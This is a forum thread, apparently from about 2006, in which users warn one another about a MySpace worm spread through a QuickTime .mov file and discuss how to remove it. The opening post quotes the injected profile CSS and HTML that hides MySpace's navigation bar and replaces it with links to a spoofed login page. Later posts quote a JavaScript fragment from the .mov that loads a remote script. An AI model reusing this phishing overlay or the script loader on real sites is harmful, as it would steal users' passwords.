Urgent! New myspace exploit

By kaneso
in Back Page News

 Share

Recommended Posts

Collaborator

kaneso

Posted
Posted (edited)

anyone use myspace? just tonight on a bunch of profiles i see this quicktime .mov file appearing everywhere.

Well it automatically plays and as soon as i view my homepage it has appeared on mine. Anyways what it bassically does is change all the links on the myspace layouts to link to http://almobty.com/css/login.html which is obviously a spoofed myspace login page and MANY people will fall for this. this is obviously trying to steal passwords and isnt just a proof of concept like some past myspace exploits.

You can easily get rid of this by removing the code in your movies sections and removing the junk code in about me section which changes the links.

Im not coder but here is the code :(maybe someone could examine it?)

About Me: 

<style type="text/css">
div table td font { display: none }
div div table tr td a.navbar, div div table tr td font { display: none }
.testnav { position:absolute; top: 136px; left:50%; _top: 146px }
</style><div style="z-index:5; background-color: #6698CB; margin-left:-400px; width: 800px" align="center" class="testnav"><div style=""><a href="http://almobty.com/css/login.html" target="" class="navbar">Home</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Browse</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Search</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Invite</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Film</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Mail</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Blog</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Favorites</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Forum</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Groups</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Events</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Videos</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Music</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Comedy</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Classifieds</a></div></div>

Movies 

<div style="width: 1px; height: 1px; overflow: hidden; text-indent: -9999px"><embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" src=http://almobty.com/css/piAF2iuswo.mov /></div>

The problem is as soon as you visit another profile with it, it comes back and its spreading like wildfire, so maybe remove and keep a low profile for the time being?

http://almobty.com appears to be a foreign website for contracting

Im running firefox 2 (so doesnt only effect IE)

Here is an example:

2005207505678579756_th.jpg

Edited by kaneso
  • coahboolley
  • Like 1
Link to comment
https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/
Share on other sites
Grand Master

Rappy Veteran

Posted
  • Veteran
Posted

Theres alot of this crap around lately to do with Myspace...thats why I have stayed away from them and been using Facebook...my mates myspace got accessed like that and he had all his friends deleted and messages sent to people saying obscene things...:(

Proficient

XPGoD

Posted
Posted

Looking at the code, it is meant to redo the entire thing... basically redo your entire profile. But there is code in it that does nothing. I think someone modified a hack from the past, and it's gotten out of control.

That imageshack photo is kinda odd... eh?

Neowinian

Syntex

Posted
Posted

it is a redirect exploit seemingly enough, the mov is used as means of spreading it adds the css code into your profile and uses it to phish you. That sall, and as far as the site it is being hosted on odds are it is a hacked server, what i would be worried about is if someone takes the spread code and uses it for something else. Thkn abotu it if they are able to get the code to edit yoru profile with a mov file just what else could be done with this

Grand Master

n_K

Posted
Posted (edited)

heh, all movies from myspace are down. myspace is crap anyway, why do people still use it ?

also, http://almobty.com DNS info:

Name Servers:

NS1.ALL-SOLUTION.NET

NS2.ALL-SOLUTION.NET

Technical Contact:

Almobty Co.

Al-Mobty Company for contracting ([email protected])

+966.4658695

Fax: +966.4659242

Olaya Street, POBox 7705 Riyadh 11472,

Tel. 966-1-4658695 & Fax. 4659242

RIYADH, 11472

SA

Damn, thats a good hacker :)

part source of QT file:

<java script:void((function(){var e=window.document.createElement('script');e.setAttribute('src','http://www.cake.fi/images/js.js');window.document.body.appendChild(e);})());> T<>?orig...

Edited by n_K
Neowinian

superzz

Posted
Posted

heh, all movies from myspace are down. myspace is crap anyway, why do people still use it ?

also, http://almobty.com DNS info:

Name Servers:

NS1.ALL-SOLUTION.NET

NS2.ALL-SOLUTION.NET

Technical Contact:

Almobty Co.

Al-Mobty Company for contracting ([email protected])

+966.4658695

Fax: +966.4659242

Olaya Street, POBox 7705 Riyadh 11472,

Tel. 966-1-4658695 & Fax. 4659242

RIYADH, 11472

SA

Damn, thats a good hacker :)

part source of QT file:

<java script:void((function(){var e=window.document.createElement('script');e.setAttribute('src','http://www.cake.fi/images/js.js');window.document.body.appendChild(e);})());> T<>?orig...

If you uses a text editor you can change the location of the script that it looks for and create your own custom script for your myspace page. I have download the js.js and looked at the code it just seem try to write over your formating and the it spams every 6 sec. to random id.

Grand Master

n_K

Posted
Posted

If you uses a text editor you can change the location of the script that it looks for and create your own custom script for your myspace page. I have download the js.js and looked at the code it just seem try to write over your formating and the it spams every 6 sec. to random id.

yeh, but it writes the javascript through the quicktime file so open the quicktime .mov in notepad, look at the binary followed by "apple text writer plugin"

Grand Master

+John Teacake MVC

Posted
  • MVC
Posted (edited)

I got this, Does the users PC become infected with anything?

When I view my profile and click home I get re directed to

http://www.../images/login.html

Which doesnt go anywhere obviously, Has this thing installed anything on my PC?

Edited by Sawyer12
  • 1 month later...
Neowinian

sdfhuigtreb

Posted
Posted

This has actually been around for a while. I took note of it back in October and thought nothing of it. I even warned people about this .mov exploit and nobody really listened. I guess I should have posted something here, eh? :laugh: . This has happened to me twice now, and yes, I know how to get rid of it. But I'm tired of the insecure status of Myspace, and therefore have deleted my account.

I'm glad someone made this public, as it should be addressed to both Myspace and the people who use it.

Everyone who has contributed to this thread thus far has explained the majority of this exploit. There are several sources of the .mov and I don't think this will be fixed for a while. I suggest that you leave Myspace as soon as possible, people. I'm actually glad this happened to me more than once; now I won't be wasting any MORE time. :laugh:. It's only going to get worse from here on, and we can't really do anything about it.

Ah well. I guess that's how it goes... :p

This topic is now closed to further replies.
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.

  • Popular Now

  • Posts

    • CPU-Z 2.20.2

      By Copernic · Posted

      CPU-Z 2.20.2 by Razvan Serea CPU-Z is a freeware utility that gathers information on some of the main devices of your system. CPU-Z does not need to be installed, just unzip the files in a directory and run the .exe. In order to remove the program, just delete the files. The program does not copy any file in any Windows directory, nor write to the registry. CPU Name and number. Core stepping and process. Package. Core voltage. Internal and external clocks, clock multiplier. Supported instructions sets. All cache levels (location, size, speed, technology). Mainboard Vendor, model and revision. BIOS model and date. Chipset (northbridge and southbridge) and sensor. Graphic interface. Memory Frequency and timings. Module(s) specification using SPD (Serial Presence Detect) : vendor, serial number, timings table. System Windows and DirectX version. CPU-Z 2.20.2 changelog: Intel Arc G3 and G3 Extreme (Panther Lake)(2.20.2). AMD Ryzen 7 7700X3D (Raphael) (2.20.1). AMD Ryzen AI Max+ 495, 492, 488 (Gorgon Halo). AMD Ryzen AI Max 490, 485 (Gorgon Halo). AMD Ryzen AI Max PRO 495, 490, 485, 480 (Gorgon Halo). AMD Ryzen 9 9950X3D2 (Granite Ridge). AMD Ryzen 9 PRO 9965X3D, PRO 9945 (Granite Ridge). AMD Ryzen 7 PRO 9755, PRO 9745 (Granite Ridge). AMD Ryzen 5 PRO 9645 (Granite Ridge). AMD Ryzen AI 7/PRO 450G/GE (Gorgon Point 2). AMD Ryzen AI 5/PRO 440G/GE (Gorgon Point 2). AMD Ryzen AI 5/PRO 435G/GE (Gorgon Point 3). AMD Ryzen AI Max+ 392 (Strix Halo). Intel Core Ultra 5 250KF Plus (Arrow Lake Refresh). Intel Core 7 360 and 350 (Wildcat Lake). Intel Core 5 330, 320 and 315 (Wildcat Lake). Intel Core 3 304 (Wildcat Lake). Intel Core 9 273PQE, 273PTE, 273PE (Bartlett Lake). Intel Core 7 253PQE, 253PTE, 253PE, 251TE, 251E (Bartlett Lake). Intel Core 5 223PQE, 223PTE, 223PE, 221TE, 221E, 213PTE, 213PE, 211TE, 211E (Bartlett Lake). Intel Core 3 201TE, 201E (Bartlett Lake). Intel Arc Pro B70 and B65 (BMG-G31). Intel Arc Pro B60 and B50 (BMG-G21). Support of HUDIMM and HSODIMM memory modules. Download: CPU-Z 2.20.2 | Portable ~5.0 MB (Freeware) View: CPU-Z Website | Screenshot Get alerted to all of our Software updates on Twitter at @NeowinSoftware
    • Browser vendors pen open letter to Microsoft saying "enough is enough"

      By excalpius · Posted

      Oh no! Not the BCA!!!
    • Browser vendors pen open letter to Microsoft saying "enough is enough"

      By Co-ords · Posted

      Anyone who expects MS to play fair is a complete idiot.
    • Browser vendors pen open letter to Microsoft saying "enough is enough"

      By RejZoR · Posted

      Everyone behaves like Internet Explorer just never happened and Edge is whole new thing all while Microsoft is pulling the exact same ###### it did back then. Sigh.
    • Still using Classic Outlook? Microsoft highlights 15 reasons to switch to New Outlook

      By Elliot B. · Posted

      Can you edit incoming emails, yet? You couldn't as of six months ago when I tried.

  • Recent Achievements

    • Conversation Starter
      mobandz earned a badge
      Conversation Starter
    • Apprentice
      fernan99 went up a rank
      Apprentice
    • One Month Later
      nothanks earned a badge
      One Month Later
    • One Month Later
      B2Proxy earned a badge
      One Month Later
    • One Year In
      MadMung0 earned a badge
      One Year In

  • Popular Contributors

    1. 1
      +primortal
      468
    2. 2
      PsYcHoKiLLa
      250
    3. 3
      Skyfrog
      79
    4. 4
      FloatingFatMan
      77
    5. 5
      Michael Scrip
      60
    Show More

  • Tell a friend

    Love Neowin? Tell a friend!